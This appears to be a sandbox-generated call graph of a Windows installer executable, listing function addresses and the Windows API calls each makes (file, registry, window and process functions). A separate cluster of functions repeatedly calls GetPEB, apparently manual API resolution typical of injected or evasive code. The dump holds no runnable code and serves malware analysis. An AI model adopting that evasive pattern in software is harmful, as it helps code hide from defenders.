3954->3949 3960 402858 SendMessageA 3961 402872 InvalidateRect 3960->3961 3962 40287d 3960->3962 3961->3962 3963 4018d8 3964 40190f 3963->3964 3965 4029e8 18 API calls 3964->3965 3966 401914 3965->3966 3967 4053aa 68 API calls 3966->3967 3968 40191d 3967->3968 3969 402259 3970 4029e8 18 API calls 3969->3970 3971 402267 3970->3971 3972 4029e8 18 API calls 3971->3972 3973 402270 3972->3973 3974 4029e8 18 API calls 3973->3974 3975 40227a GetPrivateProfileStringA 3974->3975 3976 40155b 3977 401577 ShowWindow 3976->3977 3978 40157e 3976->3978 3977->3978 3979 40158c ShowWindow 3978->3979 3980 40287d 3978->3980 3979->3980 3981 4018db 3982 4029e8 18 API calls 3981->3982 3983 4018e2 3982->3983 3984 405346 MessageBoxIndirectA 3983->3984 3985 4018eb 3984->3985 3986 404f61 3987 404f82 GetDlgItem GetDlgItem GetDlgItem 3986->3987 3988 40510d 3986->3988 4032 403e6c SendMessageA 3987->4032 3990 405116 GetDlgItem CreateThread CloseHandle 3988->3990 3991 40513e 3988->3991 3990->3991 3993 405169 3991->3993 3994 405155 ShowWindow ShowWindow 3991->3994 3995 40518b 3991->3995 3992 404ff3 3997 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3992->3997 3996 4051c7 3993->3996 3999 4051a0 ShowWindow 3993->3999 4000 40517a 3993->4000 4037 403e6c SendMessageA 3994->4037 4041 403e9e 3995->4041 3996->3995 4004 4051d2 SendMessageA 3996->4004 4002 405069 3997->4002 4003 40504d SendMessageA SendMessageA 3997->4003 4007 4051c0 3999->4007 4008 4051b2 3999->4008 4038 403e10 4000->4038 4011 40507c 4002->4011 4012 40506e SendMessageA 4002->4012 4003->4002 4006 405199 4004->4006 4013 4051eb CreatePopupMenu 4004->4013 4010 403e10 SendMessageA 4007->4010 4009 404e23 25 API calls 4008->4009 4009->4007 4010->3996 4033 403e37 4011->4033 4012->4011 4014 405aa7 18 API calls 4013->4014 4016 4051fb AppendMenuA 4014->4016 4018 405221 4016->4018 4019 40520e GetWindowRect 4016->4019 4017 40508c 4020 405095 ShowWindow 4017->4020 4021 4050c9 GetDlgItem SendMessageA 4017->4021 4023 40522a TrackPopupMenu 4018->4023 4019->4023 4024 4050b8 4020->4024 4025 4050ab ShowWindow 4020->4025 4021->4006 4022 4050f0 SendMessageA SendMessageA 4021->4022 4022->4006 4023->4006 4026 405248 4023->4026 4036 403e6c SendMessageA 4024->4036 4025->4024 4027 405264 SendMessageA 4026->4027 4027->4027 4029 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4027->4029 4030 4052a3 SendMessageA 4029->4030 4030->4030 4031 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4030->4031 4031->4006 4032->3992 4034 405aa7 18 API calls 4033->4034 4035 403e42 SetDlgItemTextA 4034->4035 4035->4017 4036->4021 4037->3993 4039 403e17 4038->4039 4040 403e1d SendMessageA 4038->4040 4039->4040 4040->3995 4042 403eb6 GetWindowLongA 4041->4042 4052 403f3f 4041->4052 4043 403ec7 4042->4043 4042->4052 4044 403ed6 GetSysColor 4043->4044 4045 403ed9 4043->4045 4044->4045 4046 403ee9 SetBkMode 4045->4046 4047 403edf SetTextColor 4045->4047 4048 403f01 GetSysColor 4046->4048 4049 403f07 4046->4049 4047->4046 4048->4049 4050 403f18 4049->4050 4051 403f0e SetBkColor 4049->4051 4050->4052 4053 403f32 CreateBrushIndirect 4050->4053 4054 403f2b DeleteObject 4050->4054 4051->4050 4052->4006 4053->4052 4054->4053 4055 403964 4056 403ab7 4055->4056 4057 40397c 4055->4057 4059 403b08 4056->4059 4060 403ac8 GetDlgItem GetDlgItem 4056->4060 4057->4056 4058 403988 4057->4058 4061 403993 SetWindowPos 4058->4061 4062 4039a6 4058->4062 4064 403b62 4059->4064 4072 401389 2 API calls 4059->4072 4063 403e37 19 API calls 4060->4063 4061->4062 4066 4039c3 4062->4066 4067 4039ab ShowWindow 4062->4067 4068 403af2 SetClassLongA 4063->4068 4065 403e83 SendMessageA 4064->4065 4085 403ab2 4064->4085 4097 403b74 4065->4097 4069 4039e5 4066->4069 4070 4039cb DestroyWindow 4066->4070 4067->4066 4071 40140b 2 API calls 4068->4071 4073 4039ea SetWindowLongA 4069->4073 4074 4039fb 4069->4074 4122 403dc0 4070->4122 4071->4059 4075 403b3a 4072->4075 4073->4085 4079 403a72 4074->4079 4080 403a07 GetDlgItem 4074->4080 4075->4064 4076 403b3e SendMessageA 4075->4076 4076->4085 4077 40140b 2 API calls 4077->4097 4078 403dc2 DestroyWindow EndDialog 4078->4122 4081 403e9e 8 API calls 4079->4081 4083 403a37 4080->4083 4084 403a1a SendMessageA IsWindowEnabled 4080->4084 4081->4085 4082 403df1 ShowWindow 4082->4085 4087 403a44 4083->4087 4088 403a8b SendMessageA 4083->4088 4089 403a57 4083->4089 4096 403a3c 4083->4096 4084->4083 4084->4085 4086 405aa7 18 API calls 4086->4097 4087->4088 4087->4096 4088->4079 4091 403a74 4089->4091 4092 403a5f 4089->4092 4090 403e10 SendMessageA 4090->4079 4094 40140b 2 API calls 4091->4094 4093 40140b 2 API calls 4092->4093 4093->4096 4094->4096 4095 403e37 19 API calls 4095->4097 4096->4079 4096->4090 4097->4077 4097->4078 4097->4085 4097->4086 4097->4095 4098 403e37 19 API calls 4097->4098 4113 403d02 DestroyWindow 4097->4113 4099 403bef GetDlgItem 4098->4099 4100 403c04 4099->4100 4101 403c0c ShowWindow EnableWindow 4099->4101 4100->4101 4123 403e59 EnableWindow 4101->4123 4103 403c36 EnableWindow 4106 403c4a 4103->4106 4104 403c4f GetSystemMenu EnableMenuItem SendMessageA 4105 403c7f SendMessageA 4104->4105 4104->4106 4105->4106 4106->4104 4124 403e6c SendMessageA 4106->4124 4125 405a85 lstrcpynA 4106->4125 4109 403cad lstrlenA 4110 405aa7 18 API calls 4109->4110 4111 403cbe SetWindowTextA 4110->4111 4112 401389 2 API calls 4111->4112 4112->4097 4114 403d1c CreateDialogParamA 4113->4114 4113->4122 4115 403d4f 4114->4115 4114->4122 4116 403e37 19 API calls 4115->4116 4117 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4116->4117 4118 401389 2 API calls 4117->4118 4119 403da0 4118->4119 4119->4085 4120 403da8 ShowWindow 4119->4120 4121 403e83 SendMessageA 4120->4121 4121->4122 4122->4082 4122->4085 4123->4103 4124->4106 4125->4109 4126 402164 4127 4029e8 18 API calls 4126->4127 4128 40216a 4127->4128 4129 4029e8 18 API calls 4128->4129 4130 402173 4129->4130 4131 4029e8 18 API calls 4130->4131 4132 40217c 4131->4132 4133 405d7c 2 API calls 4132->4133 4134 402185 4133->4134 4135 402196 lstrlenA lstrlenA 4134->4135 4136 402189 4134->4136 4138 404e23 25 API calls 4135->4138 4137 404e23 25 API calls 4136->4137 4140 402191 4137->4140 4139 4021d2 SHFileOperationA 4138->4139 4139->4136 4139->4140 4141 4019e6 4142 4029e8 18 API calls 4141->4142 4143 4019ef ExpandEnvironmentStringsA 4142->4143 4144 401a03 4143->4144 4145 401a16 4143->4145 4144->4145 4146 401a08 lstrcmpA 4144->4146 4146->4145 4147 4021e6 4148 4021ed 4147->4148 4151 402200 4147->4151 4149 405aa7 18 API calls 4148->4149 4150 4021fa 4149->4150 4152 405346 MessageBoxIndirectA 4150->4152 4152->4151 4160 401c6d 4161 4029cb 18 API calls 4160->4161 4162 401c73 IsWindow 4161->4162 4163 4019d6 4162->4163 4164 4025ed 4165 4025f4 4164->4165 4166 40287d 4164->4166 4167 4025fa FindClose 4165->4167 4167->4166 4168 40266e 4169 4029e8 18 API calls 4168->4169 4171 40267c 4169->4171 4170 402692 4173 40573d 2 API calls 4170->4173 4171->4170 4172 4029e8 18 API calls 4171->4172 4172->4170 4174 402698 4173->4174 4194 40575c GetFileAttributesA CreateFileA 4174->4194 4176 4026a5 4177 4026b1 GlobalAlloc 4176->4177 4178 40274e 4176->4178 4179 402745 CloseHandle 4177->4179 4180 4026ca 4177->4180 4181 402756 DeleteFileA 4178->4181 4182 402769 4178->4182 4179->4178 4195 4031da SetFilePointer 4180->4195 4181->4182 4184 4026d0 4185 4031a8 ReadFile 4184->4185 4186 4026d9 GlobalAlloc 4185->4186 4187 4026e9 4186->4187 4188 40271d WriteFile GlobalFree 4186->4188 4190 402f01 47 API calls 4187->4190 4189 402f01 47 API calls 4188->4189 4191 402742 4189->4191 4193 4026f6 4190->4193 4191->4179 4192 402714 GlobalFree 4192->4188 4193->4192 4194->4176 4195->4184 4196 40276f 4197 4029cb 18 API calls 4196->4197 4198 402775 4197->4198 4199 4027b0 4198->4199 4200 402799 4198->4200 4206 40264e 4198->4206 4203 4027c6 4199->4203 4204 4027ba 4199->4204 4201 4027ad 4200->4201 4202 40279e 4200->4202 4211 4059e3 wsprintfA 4201->4211 4210 405a85 lstrcpynA 4202->4210 4207 405aa7 18 API calls 4203->4207 4205 4029cb 18 API calls 4204->4205 4205->4206 4207->4206 4210->4206 4211->4206 4212 4014f0 SetForegroundWindow 4213 40287d 4212->4213 4214 404772 GetDlgItem GetDlgItem 4215 4047c6 7 API calls 4214->4215 4221 4049e3 4214->4221 4216 40486c DeleteObject 4215->4216 4217 40485f SendMessageA 4215->4217 4218 404877 4216->4218 4217->4216 4219 4048ae 4218->4219 4224 405aa7 18 API calls 4218->4224 4222 403e37 19 API calls 4219->4222 4220 404acd 4223 404b7c 4220->4223 4229 4049d6 4220->4229 4233 404b26 SendMessageA 4220->4233 4221->4220 4244 404a57 4221->4244 4267 4046f2 SendMessageA 4221->4267 4228 4048c2 4222->4228 4225 404b91 4223->4225 4226 404b85 SendMessageA 4223->4226 4227 404890 SendMessageA SendMessageA 4224->4227 4235 404ba3 ImageList_Destroy 4225->4235 4236 404baa 4225->4236 4245 404bba 4225->4245 4226->4225 4227->4218 4232 403e37 19 API calls 4228->4232 4234 403e9e 8 API calls 4229->4234 4230 404abf SendMessageA 4230->4220 4249 4048d0 4232->4249 4233->4229 4238 404b3b SendMessageA 4233->4238 4239 404d6c 4234->4239 4235->4236 4240 404bb3 GlobalFree 4236->4240 4236->4245 4237 404d20 4237->4229 4246 404d32 ShowWindow GetDlgItem ShowWindow 4237->4246 4242 404b4e 4238->4242 4240->4245 4241 4049a4 GetWindowLongA SetWindowLongA 4243 4049bd 4241->4243 4255 404b5f SendMessageA 4242->4255 4247 4049c3 ShowWindow 4243->4247 4248 4049db 4243->4248 4244->4220 4244->4230 4245->4237 4250 404bec 4245->4250 4254 40140b 2 API calls 4245->4254 4246->4229 4265 403e6c SendMessageA 4247->4265 4266 403e6c SendMessageA 4248->4266 4249->4241 4253 40491f SendMessageA 4249->4253 4256 40499e 4249->4256 4257 40495b SendMessageA 4249->4257 4258 40496c SendMessageA 4249->4258 4261 404c1a SendMessageA 4250->4261 4264 404c30 4250->4264 4253->4249 4254->4250 4255->4223 4256->4241 4256->4243 4257->4249 4258->4249 4259 404cf6 InvalidateRect 4259->4237 4260 404d0c 4259->4260 4272 404610 4260->4272 4261->4264 4263 404ca4 SendMessageA SendMessageA 4263->4264 4264->4259 4264->4263 4265->4229 4266->4221 4268 404751 SendMessageA 4267->4268 4269 404715 GetMessagePos ScreenToClient SendMessageA 4267->4269 4270 404749 4268->4270 4269->4270 4271 40474e 4269->4271 4270->4244 4271->4268 4273 40462a 4272->4273 4274 405aa7 18 API calls 4273->4274 4275 40465f 4274->4275 4276 405aa7 18 API calls 4275->4276 4277 40466a 4276->4277 4278 405aa7 18 API calls 4277->4278 4279 40469b lstrlenA wsprintfA SetDlgItemTextA 4278->4279 4279->4237 4280 404d73 4281 404d81 4280->4281 4282 404d98 4280->4282 4283 404d87 4281->4283 4298 404e01 4281->4298 4284 404da6 IsWindowVisible 4282->4284 4288 404dbd 4282->4288 4285 403e83 SendMessageA 4283->4285 4287 404db3 4284->4287 4284->4298 4289 404d91 4285->4289 4286 404e07 CallWindowProcA 4286->4289 4290 4046f2 5 API calls 4287->4290 4288->4286 4299 405a85 lstrcpynA 4288->4299 4290->4288 4292 404dec 4300 4059e3 wsprintfA 4292->4300 4294 404df3 4295 40140b 2 API calls 4294->4295 4296 404dfa 4295->4296 4301 405a85 lstrcpynA 4296->4301 4298->4286 4299->4292 4300->4294 4301->4298 4302 404275 4303 4042b3 4302->4303 4304 4042a6 4302->4304 4306 4042bc GetDlgItem 4303->4306 4312 40431f 4303->4312 4363 40532a GetDlgItemTextA 4304->4363 4309 4042d0 4306->4309 4307 404403 4361 40458f 4307->4361 4365 40532a GetDlgItemTextA 4307->4365 4308 4042ad 4310 405ce3 5 API calls 4308->4310 4311 4042e4 SetWindowTextA 4309->4311 4315 40560c 4 API calls 4309->4315 4310->4303 4316 403e37 19 API calls 4311->4316 4312->4307 4317 405aa7 18 API calls 4312->4317 4312->4361 4314 403e9e 8 API calls 4319 4045a3 4314->4319 4320 4042da 4315->4320 4321 404302 4316->4321 4322 404395 SHBrowseForFolderA 4317->4322 4318 40442f 4323 405659 18 API calls 4318->4323 4320->4311 4327 405578 3 API calls 4320->4327 4324 403e37 19 API calls 4321->4324 4322->4307 4325 4043ad CoTaskMemFree 4322->4325 4326 404435 4323->4326 4328 404310 4324->4328 4329 405578 3 API calls 4325->4329 4366 405a85 lstrcpynA 4326->4366 4327->4311 4364 403e6c SendMessageA 4328->4364 4331 4043ba 4329->4331 4334 4043f1 SetDlgItemTextA 4331->4334 4338 405aa7 18 API calls 4331->4338 4333 404318 4336 405da3 3 API calls 4333->4336 4334->4307 4335 40444c 4337 405da3 3 API calls 4335->4337 4336->4312 4344 404454 4337->4344 4340 4043d9 lstrcmpiA 4338->4340 4339 40448e 4367 405a85 lstrcpynA 4339->4367 4340->4334 4341 4043ea lstrcatA 4340->4341 4341->4334 4343 404497 4345 40560c 4 API calls 4343->4345 4344->4339 4346 4044e1 4344->4346 4350 4055bf 2 API calls 4344->4350 4347 40449d GetDiskFreeSpaceA 4345->4347 4351 40453e 4346->4351 4353 404610 21 API calls 4346->4353 4347->4346 4349 4044bf MulDiv 4347->4349 4349->4346 4350->4344 4352 404561 4351->4352 4354 40140b 2 API calls 4351->4354 4368 403e59 EnableWindow 4352->4368 4355 404530 4353->4355 4354->4352 4357 404540 SetDlgItemTextA 4355->4357 4358 404535 4355->4358 4357->4351 4360 404610 21 API calls 4358->4360 4359 40457d 4359->4361 4369 40420a 4359->4369 4360->4351 4361->4314 4363->4308 4364->4333 4365->4318 4366->4335 4367->4343 4368->4359 4370 404218 4369->4370 4371 40421d SendMessageA 4369->4371 4370->4371 4371->4361 4372 4022f5 4373 4022fb 4372->4373 4374 4029e8 18 API calls 4373->4374 4375 40230d 4374->4375 4376 4029e8 18 API calls 4375->4376 4377 402317 RegCreateKeyExA 4376->4377 4378 402341 4377->4378 4380 40264e 4377->4380 4379 402359 4378->4379 4381 4029e8 18 API calls 4378->4381 4382 4029cb 18 API calls 4379->4382 4385 402365 4379->4385 4384 402352 lstrlenA 4381->4384 4382->4385 4383 402380 RegSetValueExA 4387 402396 RegCloseKey 4383->4387 4384->4379 4385->4383 4386 402f01 47 API calls 4385->4386 4386->4383 4387->4380 4389 4027f5 4390 4029cb 18 API calls 4389->4390 4391 4027fb 4390->4391 4392 40282c 4391->4392 4393 40264e 4391->4393 4395 402809 4391->4395 4392->4393 4394 405aa7 18 API calls 4392->4394 4394->4393 4395->4393 4397 4059e3 wsprintfA 4395->4397 4397->4393 4398 19f1ae 4400 19f20d 4398->4400 4412 19ebcf GetPEB 4398->4412 4401 19f2f8 4400->4401 4403 19f305 4400->4403 4411 19f2bb 4400->4411 4413 19f4de 4401->4413 4403->4411 4426 19e76f 4403->4426 4405 19f40b 4406 19f478 4405->4406 4407 19e76f 4 API calls 4405->4407 4405->4411 4408 19e76f 4 API calls 4406->4408 4407->4405 4409 19f497 4408->4409 4409->4411 4435 19e6be 4409->4435 4412->4400 4444 19ebcf GetPEB 4413->4444 4415 19f69f 4418 19e76f 4 API calls 4415->4418 4425 19f5f5 4415->4425 4416 19f4ec 4416->4415 4416->4425 4445 19e870 4416->4445 4419 19f6eb 4418->4419 4420 19f745 4419->4420 4421 19e76f 4 API calls 4419->4421 4419->4425 4422 19e76f 4 API calls 4420->4422 4421->4419 4423 19f75f 4422->4423 4424 19e6be 4 API calls 4423->4424 4423->4425 4424->4425 4425->4411 4427 19e78a 4426->4427 4428 19ec0e GetPEB 4427->4428 4429 19e7ab 4428->4429 4430 19e83d 4429->4430 4431 19e7b3 4429->4431 4469 19e688 4430->4469 4433 19e90a 3 API calls 4431->4433 4434 19e824 4433->4434 4434->4405 4436 19e6d9 4435->4436 4437 19ec0e GetPEB 4436->4437 4438 19e6fa 4437->4438 4439 19e6fe 4438->4439 4440 19e744 4438->4440 4442 19e90a 3 API calls 4439->4442 4472 19e69a 4440->4472 4443 19e739 4442->4443 4443->4411 4444->4416 4446 19e883 4445->4446 4454 19ec0e GetPEB 4446->4454 4448 19e8a4 4449 19e8a8 4448->4449 4450 19e8ee 4448->4450 4456 19e90a GetPEB 4449->4456 4460 19e6ac 4450->4460 4453 19e8e3 4453->4415 4455 19ec31 4454->4455 4455->4448 4457 19e96f 4456->4457 4463 19ec4c GetPEB 4457->4463 4459 19e9e3 4459->4453 4461 19e90a 3 API calls 4460->4461 4462 19e6b6 4461->4462 4462->4453 4464 19ec5f 4463->4464 4466 19ec73 4464->4466 4467 19eb1e GetPEB 4464->4467 4466->4459 4468 19eb49 4467->4468 4468->4464 4470 19e90a 3 API calls 4469->4470 4471 19e692 4470->4471 4471->4434 4473 19e90a 3 API calls 4472->4473 4474 19e6a4 4473->4474 4474->4443 4475 4024f8 4476 4029cb 18 API calls 4475->4476 4479 402502 4476->4479 4477 402578 4478 402536 ReadFile 4478->4477 4478->4479 4479->4477 4479->4478 4480 40257a 4479->4480 4482 40258a 4479->4482 4484 4059e3 wsprintfA 4480->4484 4482->4477 4483 4025a0 SetFilePointer 4482->4483 4483->4477 4484->4477 4485 4016fa 4486 4029e8 18 API calls 4485->4486 4487 401701 SearchPathA 4486->4487 4488 40171c 4487->4488 4489 4014fe 4490 401506 4489->4490 4492 401519 4489->4492 4491 4029cb 18 API calls 4490->4491 4491->4492 4493 403f7f 4494 403f95 4493->4494 4497 4040a2 4493->4497 4498 403e37 19 API calls 4494->4498 4495 404111 4496 4041e5 4495->4496 4499 40411b GetDlgItem 4495->4499 4504 403e9e 8 API calls 4496->4504 4497->4495 4497->4496 4503 4040e6 GetDlgItem SendMessageA 4497->4503 4500 403feb 4498->4500 4501 404131 4499->4501 4502 4041a3 4499->4502 4505 403e37 19 API calls 4500->4505 4501->4502 4509 404157 6 API calls 4501->4509 4502->4496 4510 4041b5 4502->4510 4524 403e59 EnableWindow 4503->4524 4507 4041e0 4504->4507 4508 403ff8 CheckDlgButton 4505->4508 4522 403e59 EnableWindow 4508->4522 4509->4502 4511 4041bb SendMessageA 4510->4511 4512 4041cc 4510->4512 4511->4512 4512->4507 4515 4041d2 SendMessageA 4512->4515 4513 40410c 4516 40420a SendMessageA 4513->4516 4515->4507 4516->4495 4517 404016 GetDlgItem 4523 403e6c SendMessageA 4517->4523 4519 40402c SendMessageA 4520 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4519->4520 4521 40404a GetSysColor 4519->4521 4520->4507 4521->4520 4522->4517 4523->4519 4524->4513 4525 401000 4526 401037 BeginPaint GetClientRect 4525->4526 4527 40100c DefWindowProcA 4525->4527 4529 4010f3 4526->4529 4532 401179 4527->4532 4530 401073 CreateBrushIndirect FillRect DeleteObject 4529->4530 4531 4010fc 4529->4531 4530->4529 4533 401102 CreateFontIndirectA 4531->4533 4534 401167 EndPaint 4531->4534 4533->4534 4535 401112 6 API calls 4533->4535 4534->4532 4535->4534 4550 401b06 4551 401b13 4550->4551 4552 401b57 4550->4552 4555 4021ed 4551->4555 4560 401b2a 4551->4560 4553 401b80 GlobalAlloc 4552->4553 4554 401b5b 4552->4554 4556 405aa7 18 API calls 4553->4556 4568 401b9b 4554->4568 4571 405a85 lstrcpynA 4554->4571 4557 405aa7 18 API calls 4555->4557 4556->4568 4559 4021fa 4557->4559 4563 405346 MessageBoxIndirectA 4559->4563 4569 405a85 lstrcpynA 4560->4569 4561 401b6d GlobalFree 4561->4568 4563->4568 4564 401b39 4570 405a85 lstrcpynA 4564->4570 4566 401b48 4572 405a85 lstrcpynA 4566->4572 4569->4564 4570->4566 4571->4561 4572->4568 4573 402607 4574 40260a 4573->4574 4576 402622 4573->4576 4575 402617 FindNextFileA 4574->4575 4575->4576 4577 402661 4575->4577 4579 405a85 lstrcpynA 4577->4579 4579->4576 3889 401389 3891 401390 3889->3891 3890 4013fe 3891->3890 3892 4013cb MulDiv SendMessageA 3891->3892 3892->3891 4587 401c8a 4588 4029cb 18 API calls 4587->4588 4589 401c91 4588->4589 4590 4029cb 18 API calls 4589->4590 4591 401c99 GetDlgItem 4590->4591 4592 4024aa 4591->4592 4593 40248e 4594 4029e8 18 API calls 4593->4594 4595 402495 4594->4595 4598 40575c GetFileAttributesA CreateFileA 4595->4598 4597 4024a1 4598->4597 4599 402012 4600 4029e8 18 API calls 4599->4600 4601 402019 4600->4601 4602 4029e8 18 API calls 4601->4602 4603 402023 4602->4603 4604 4029e8 18 API calls 4603->4604 4605 40202c 4604->4605 4606 4029e8 18 API calls 4605->4606 4607 402036 4606->4607 4608 4029e8 18 API calls 4607->4608 4610 402040 4608->4610 4609 402054 CoCreateInstance 4614 402073 4609->4614 4616 402129 4609->4616 4610->4609 4611 4029e8 18 API calls 4610->4611 4611->4609 4612 401423 25 API calls 4613 40215b 4612->4613 4615 402108 MultiByteToWideChar 4614->4615 4614->4616 4615->4616 4616->4612 4616->4613 4617 402215 4618 402223 4617->4618 4619 40221d 4617->4619 4621 402233 4618->4621 4622 4029e8 18 API calls 4618->4622 4620 4029e8 18 API calls 4619->4620 4620->4618 4623 4029e8 18 API calls 4621->4623 4625 402241 4621->4625 4622->4621 4623->4625 4624 4029e8 18 API calls 4626 40224a WritePrivateProfileStringA 4624->4626 4625->4624 4627 401595 4628 4029e8 18 API calls 4627->4628 4629 40159c SetFileAttributesA 4628->4629 4630 4015ae 4629->4630 4631 401d95 4632 4029cb 18 API calls 4631->4632 4633 401d9b 4632->4633 4634 4029cb 18 API calls 4633->4634 4635 401da4 4634->4635 4636 401db6 EnableWindow 4635->4636 4637 401dab ShowWindow 4635->4637 4638 40287d 4636->4638 4637->4638 4639 401e95 4640 4029e8 18 API calls 4639->4640 4641 401e9c 4640->4641 4642 405d7c 2 API calls 4641->4642 4643 401ea2 4642->4643 4645 401eb4 4643->4645 4646 4059e3 wsprintfA 4643->4646 4646->4645 4647 401696 4648 4029e8 18 API calls 4647->4648 4649 40169c GetFullPathNameA 4648->4649 4650 4016b3 4649->4650 4651 4016d4 4649->4651 4650->4651 4654 405d7c 2 API calls 4650->4654 4652 4016e8 GetShortPathNameA 4651->4652 4653 40287d 4651->4653 4652->4653 4655 4016c4 4654->4655 4655->4651 4657 405a85 lstrcpynA 4655->4657 4657->4651 4665 402419 4675 402af2 4665->4675 4667 402423 4668 4029cb 18 API calls 4667->4668 4669 40242c 4668->4669 4670 402443 RegEnumKeyA 4669->4670 4671 40244f RegEnumValueA 4669->4671 4673 40264e 4669->4673 4672 402468 RegCloseKey 4670->4672 4671->4672 4671->4673 4672->4673 4676 4029e8 18 API calls 4675->4676 4677 402b0b 4676->4677 4678 402b19 RegOpenKeyExA 4677->4678 4678->4667 4679 402299 4680 4022c9 4679->4680 4681 40229e 4679->4681 4682 4029e8 18 API calls 4680->4682 4683 402af2 19 API calls 4681->4683 4684 4022d0 4682->4684 4685 4022a5 4683->4685 4690 402a28 RegOpenKeyExA 4684->4690 4686 4022e6 4685->4686 4687 4029e8 18 API calls 4685->4687 4688 4022b6 RegDeleteValueA RegCloseKey 4687->4688 4688->4686 4697 402a9f 4690->4697 4698 402a53 4690->4698 4691 402a79 RegEnumKeyA 4692 402a8b RegCloseKey 4691->4692 4691->4698 4694 405da3 3 API calls 4692->4694 4693 402ab0 RegCloseKey 4693->4697 4696 402a9b 4694->4696 4695 402a28 3 API calls 4695->4698 4696->4697 4699 402acb RegDeleteKeyA 4696->4699 4697->4686 4698->4691 4698->4692 4698->4693 4698->4695 4699->4697 4700 401d1b GetDC GetDeviceCaps 4701 4029cb 18 API calls 4700->4701 4702 401d37 MulDiv 4701->4702 4703 4029cb 18 API calls 4702->4703 4704 401d4c 4703->4704 4705 405aa7 18 API calls 4704->4705 4706 401d85 CreateFontIndirectA 4705->4706 4707 4024aa 4706->4707 4708 401e1b 4709 4029e8 18 API calls 4708->4709 4710 401e21 4709->4710 4711 404e23 25 API calls 4710->4711 4712 401e2b 4711->4712 4713 4052e5 2 API calls 4712->4713 4716 401e31 4713->4716 4714 401e87 CloseHandle 4718 40264e 4714->4718 4715 401e50 WaitForSingleObject 4715->4716 4717 401e5e GetExitCodeProcess 4715->4717 4716->4714 4716->4715 4716->4718 4719 405ddc 2 API calls 4716->4719 4720 401e70 4717->4720 4721 401e79 4717->4721 4719->4715 4723 4059e3 wsprintfA 4720->4723 4721->4714 4723->4721 3426 401721 3427 4029e8 18 API calls 3426->3427 3428 401728 3427->3428 3432 40578b 3428->3432 3430 40172f 3431 40578b 2 API calls 3430->3431 3431->3430 3433 405796 GetTickCount GetTempFileNameA 3432->3433 3434 4057c2 3433->3434 3435 4057c6 3433->3435 3434->3433 3434->3435 3435->3430 4724 4023a1 4725 402af2 19 API calls 4724->4725 4726 4023ab 4725->4726 4727 4029e8 18 API calls 4726->4727 4728 4023b4 4727->4728 4729 4023be RegQueryValueExA 4728->4729 4733 40264e 4728->4733 4730 4023e4 RegCloseKey 4729->4730 4731 4023de 4729->4731 4730->4733 4731->4730 4735 4059e3 wsprintfA 4731->4735 4735->4730 4736 401922 4737 4029e8 18 API calls 4736->4737 4738 401929 lstrlenA 4737->4738 4739 4024aa 4738->4739 3575 403225 #17 SetErrorMode OleInitialize 3645 405da3 GetModuleHandleA 3575->3645 3579 403293 GetCommandLineA 3650 405a85 lstrcpynA 3579->3650 3581 4032a5 GetModuleHandleA 3582 4032bc 3581->3582 3583 4055a3 CharNextA 3582->3583 3584 4032d0 CharNextA 3583->3584 3590 4032dd 3584->3590 3585 403346 3586 403359 GetTempPathA 3585->3586 3651 4031f1 3586->3651 3588 40336f 3591 403393 DeleteFileA 3588->3591 3592 403373 GetWindowsDirectoryA lstrcatA 3588->3592 3589 4055a3 CharNextA 3589->3590 3590->3585 3590->3589 3596 403348 3590->3596 3659 402c5b GetTickCount GetModuleFileNameA 3591->3659 3594 4031f1 11 API calls 3592->3594 3595 40338f 3594->3595 3595->3591 3640 40340d 3595->3640 3744 405a85 lstrcpynA 3596->3744 3597 4033a4 3601 4055a3 CharNextA 3597->3601 3631 4033fd 3597->3631 3597->3640 3603 4033bb 3601->3603 3612 4033d8 3603->3612 3613 40343c lstrcatA lstrcmpiA 3603->3613 3604 403426 3607 405346 MessageBoxIndirectA 3604->3607 3605 40350b 3606 40358e ExitProcess 3605->3606 3608 405da3 3 API calls 3605->3608 3610 403434 ExitProcess 3607->3610 3611 40351a 3608->3611 3614 405da3 3 API calls 3611->3614 3745 405659 3612->3745 3616 403458 CreateDirectoryA SetCurrentDirectoryA 3613->3616 3613->3640 3617 403523 3614->3617 3618 40347a 3616->3618 3619 40346f 3616->3619 3622 405da3 3 API calls 3617->3622 3769 405a85 lstrcpynA 3618->3769 3768 405a85 lstrcpynA 3619->3768 3625 40352c 3622->3625 3627 40357a ExitWindowsEx 3625->3627 3634 40353a GetCurrentProcess 3625->3634 3626 4033f2 3760 405a85 lstrcpynA 3626->3760 3627->3606 3630 403587 3627->3630 3629 405aa7 18 API calls 3632 4034aa DeleteFileA 3629->3632 3799 40140b 3630->3799 3689 4035e3 3631->3689 3635 4034b7 CopyFileA 3632->3635 3642 403488 3632->3642 3636 40354a 3634->3636 3635->3642 3636->3627 3637 4034ff 3638 4057d3 38 API calls 3637->3638 3638->3640 3761 4035a6 3640->3761 3641 405aa7 18 API calls 3641->3642 3642->3629 3642->3637 3642->3641 3644 4034eb CloseHandle 3642->3644 3770 4057d3 3642->3770 3796 4052e5 CreateProcessA 3642->3796 3644->3642 3646 405dca GetProcAddress 3645->3646 3647 405dbf LoadLibraryA 3645->3647 3648 403268 SHGetFileInfoA 3646->3648 3647->3646 3647->3648 3649 405a85 lstrcpynA 3648->3649 3649->3579 3650->3581 3652 405ce3 5 API calls 3651->3652 3654 4031fd 3652->3654 3653 403207 3653->3588 3654->3653 3655 405578 3 API calls 3654->3655 3656 40320f CreateDirectoryA 3655->3656 3657 40578b 2 API calls 3656->3657 3658 403223 3657->3658 3658->3588 3802 40575c GetFileAttributesA CreateFileA 3659->3802 3661 402c9e 3688 402cab 3661->3688 3803 405a85 lstrcpynA 3661->3803 3663 402cc1 3804 4055bf lstrlenA 3663->3804 3667 402cd2 GetFileSize 3668 402dd3 3667->3668 3672 402ce9 3667->3672 3669 402bc5 32 API calls 3668->3669 3671 402dda 3669->3671 3670 4031a8 ReadFile 3670->3672 3674 402e16 GlobalAlloc 3671->3674 3671->3688 3809 4031da SetFilePointer 3671->3809 3672->3668 3672->3670 3673 402e6e 3672->3673 3680 402bc5 32 API calls 3672->3680 3672->3688 3677 402bc5 32 API calls 3673->3677 3676 402e2d 3674->3676 3681 40578b 2 API calls 3676->3681 3677->3688 3678 402df7 3679 4031a8 ReadFile 3678->3679 3682 402e02 3679->3682 3680->3672 3683 402e3e CreateFileA 3681->3683 3682->3674 3682->3688 3684 402e78 3683->3684 3683->3688 3810 4031da SetFilePointer 3684->3810 3686 402e86 3687 402f01 47 API calls 